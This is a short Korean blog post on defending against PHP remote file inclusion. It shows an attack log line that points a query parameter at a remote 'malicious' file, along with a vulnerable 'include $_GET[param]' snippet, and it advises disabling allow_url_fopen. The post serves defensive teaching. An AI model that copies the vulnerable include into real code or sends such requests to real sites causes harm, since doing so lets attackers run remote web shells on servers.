[PHP]인젝션 공격 방어 대책

[PHP]인젝션 공격 방어 대책

 

 

최근에 간간이 발생되는 취약점 중 하나가 php injection입니다.

 

로그를 보시면 이런식으로 공격이 들어가죠..

 

local/test.php?param=http://malicious_text/hack.txt

 

PHP 프로그래밍 중 주의해야 할 것이 바로 PHP Injection 취약점입니다.
대한민국의 많은 게시판 및 웹 솔루션들이 바로 이 취약점에 무력화됩니다.

원격지의 파일을 로컬의 파일처럼 실행하는데 문제가 있습니다. 아래와 같이 코딩을 하게되면

param값으로 들어온 내용을 include()함수가 실행하여 처리하게 됩니다.

 

그런데 여기서 param값으로 전달되는 내용이 내부파일인지 외부파일인지를 설정에 따라 실행하게 됩니다.

( php.ini 설정에서 allow_url_fopen 이 On 인 경우, 외부 파일도 실행함 !! )

<?

        include $_GET[param];

 

        $MYSQL_HOST = "xxxxxxx";
        $MYSQL_DB = "xxxxxx";
        $MYSQL_ID = "xxxxxx_db";

 

결국 아래와 같은 원격지의 웹쉘(명령어를 실행할 수 있는 페이지)을 로컬 파일처럼 실행하여 해킹을

할 수 있습니다.

 

 

 

주의 : 반드시 php.ini 설정에서 allow_url_fopen 을 OFF 로 운영하셔야.. )

 

또 한가지 재미있는 사실은 웹 방화벽은 이러한 공격을 지극히 정상적으로 인식하여 웹 방화벽을 운영하고도

 

뚫린다는 사실입니다. ^^

출처: https://superes.tistory.com/69 [SUPERES DEV]